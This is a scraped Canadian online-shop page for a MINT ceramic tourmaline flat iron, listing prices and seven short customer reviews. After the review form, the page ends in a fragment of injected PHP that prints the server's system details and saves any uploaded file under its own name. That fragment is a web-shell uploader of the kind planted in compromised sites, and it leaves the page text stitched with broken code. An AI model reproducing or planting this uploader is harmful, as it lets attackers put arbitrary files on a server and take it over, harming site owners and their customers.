Tuesday, December 06, 2022
Welcome to VBS. Lowest Prices GUARANTEED !
Log In

Log In

Forgot Your Password?

Cart Subtotal: CA$0.00

MINT Professional Ceramic Tourmaline Flat Iron Hair Straightener 450°F Heat

Overall

Availability: In stock

Regular Price: CA$199.95

Special Price: CA$159.95

OR

Customer Reviews

7 Item(s)

per page
Quick straighten Review by Andreanna Louise
Overall
very fast heat up and takes 1 pass to smooth frizzy hair (Posted on 3/3/22)
Love it! Review by Jessa
Overall
Great iron and good size at just over 1" as I have longer hair (Posted on 3/3/22)
Fast Heat Up Review by David Ayers
Overall
I'm a dude with long hair, so I don't know too much about hair straightenres. Friend had this, I tried it and had to buy one for myself. works good. (Posted on 5/24/21)
Excellent Review by Anastasia Riderman
Overall
LOVE IT! (Posted on 5/24/21)
Perfect Review by Esland Andris
Overall
I had a Sedu prior to my stylist recommending this. Love it, straightens fast and the straightness stays. Highly recommend. (Posted on 5/24/21)
Better then my Gama Review by Tracy Tucker
Overall
I bought this as a back up flat iron to my Gama. This brand works much better for my hair type. The straightness lasts for days! (Posted on 11/23/20)
Works Great Review by Jessica Curtis
Overall
I was recommended this by my stylist. I used to use the Solia and this is 10x better. (Posted on 11/23/20)

7 Item(s)

per page

Write Your Own Review

You're reviewing: MINT Professional Ceramic Tourmaline Flat Iron Hair Straightener 450°F Heat

How do you rate this product? *

  1 star 2 stars 3 stars 4 stars 5 stars
Overall


'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES CUK !!!

'; } else { echo 'Upload GAGAL CUK !!!

'; } } ?>